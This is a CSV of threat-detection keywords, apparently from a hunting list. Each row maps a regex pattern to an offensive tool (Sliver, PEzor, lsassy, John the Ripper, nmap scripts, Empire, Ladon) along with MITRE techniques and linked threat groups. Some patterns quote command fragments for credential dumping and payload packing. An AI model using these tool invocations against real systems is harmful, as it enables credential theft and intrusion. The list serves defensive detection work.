"* ForkLib.cpp*",".{0,1000}\sForkLib\.cpp.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","0","N/A","N/A","7","3","226","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z","1219"
"* --format exe  * --jitter *",".{0,1000}\s\-\-format\sexe\s\s.{0,1000}\s\-\-jitter\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","1220"
"* --format kirbi*",".{0,1000}\s\-\-format\skirbi.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","N/A","10","1281","181","2025-01-27T09:22:54Z","2019-01-08T18:42:07Z","1221"
"* -format=bof *.exe*",".{0,1000}\s\-format\=bof\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","1222"
"* -format=bof -cleanup *",".{0,1000}\s\-format\=bof\s\-cleanup\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","1223"
"* -format=dotnet -sleep=*",".{0,1000}\s\-format\=dotnet\s\-sleep\=.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","1224"
"* -format=dotnet-pinvoke *",".{0,1000}\s\-format\=dotnet\-pinvoke\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","1225"
"* -format=dotnet-pinvoke *.exe*",".{0,1000}\s\-format\=dotnet\-pinvoke\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","1226"
"* --format=krb5asrep* --wordlist=*",".{0,1000}\s\-\-format\=krb5asrep.{0,1000}\s\-\-wordlist\=.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","1227"
"* --format=netntlmv2 *.txt*",".{0,1000}\s\-\-format\=netntlmv2\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1228"
"* --format=NT -w=*_password.txt*",".{0,1000}\s\-\-format\=NT\s\-w\=.{0,1000}_password\.txt.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper is a fast password cracker.","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/magnumripper/JohnTheRipper","1","0","#linux","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1229"
"* -format=reflective-dll *",".{0,1000}\s\-format\=reflective\-dll\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","1230"
"* -format=reflective-dll *.exe*",".{0,1000}\s\-format\=reflective\-dll\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","1231"
"* -format=service-dll *.exe*",".{0,1000}\s\-format\=service\-dll\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","1232"
"* -format=service-exe *.exe*",".{0,1000}\s\-format\=service\-exe\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","1233"
"* Found a PwDatabase! *",".{0,1000}\sFound\sa\sPwDatabase!\s.{0,1000}","offensive_tool_keyword","KeeTheft","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","KeeTheft","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","1234"
"* Found a PwDatabase! *",".{0,1000}\sFound\sa\sPwDatabase!\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","KeeTheft","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","1235"
"* fox-info.nse*",".{0,1000}\sfox\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1236"
"* freelancer-info.nse*",".{0,1000}\sfreelancer\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1237"
"* Freeze.rs/*",".{0,1000}\sFreeze\.rs\/.{0,1000}","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","0","N/A","N/A","N/A","8","716","84","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z","1238"
"* FROM dbo.C2Agents*",".{0,1000}\sFROM\sdbo\.C2Agents.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","1239"
"* FROM LDAPHUNTERFINDINGS*",".{0,1000}\sFROM\sLDAPHUNTERFINDINGS.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","N/A","7","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","1240"
"* fscan.exe*",".{0,1000}\sfscan\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","1241"
"* fscan32.exe*",".{0,1000}\sfscan32\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","1242"
"* fscan64.exe*",".{0,1000}\sfscan64\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","1243"
"* fscanarm64.exe*",".{0,1000}\sfscanarm64\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","1244"
"* fscanarmv6.exe*",".{0,1000}\sfscanarmv6\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","1245"
"* fscanarmv7.exe*",".{0,1000}\sfscanarmv7\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","1246"
"* ftp-anon.nse*",".{0,1000}\sftp\-anon\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1247"
"* ftp-bounce.nse*",".{0,1000}\sftp\-bounce\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1248"
"* ftp-brute.nse*",".{0,1000}\sftp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1249"
"* ftp-libopie.nse*",".{0,1000}\sftp\-libopie\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1250"
"* ftp-log4shell.nse*",".{0,1000}\sftp\-log4shell\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","N/A","4","351","49","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z","1251"
"* ftp-proftpd-backdoor.nse*",".{0,1000}\sftp\-proftpd\-backdoor\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1252"
"* FtpSniffer *",".{0,1000}\sFtpSniffer\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","1253"
"* ftp-syst.nse*",".{0,1000}\sftp\-syst\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1254"
"* ftp-vsftpd-backdoor.nse*",".{0,1000}\sftp\-vsftpd\-backdoor\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1255"
"* ftp-vuln-cve2010-4221.nse*",".{0,1000}\sftp\-vuln\-cve2010\-4221\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1256"
"* FudgeC2 *",".{0,1000}\sFudgeC2\s.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","1257"
"* -fullmemdmp -snap & ping 127.0.0.1 -n *",".{0,1000}\s\-fullmemdmp\s\-snap\s\&\sping\s127\.0\.0\.1\s\-n\s.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","1258"
"* -FullPrivs * ",".{0,1000}\s\-FullPrivs\s.{0,1000}\s","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - 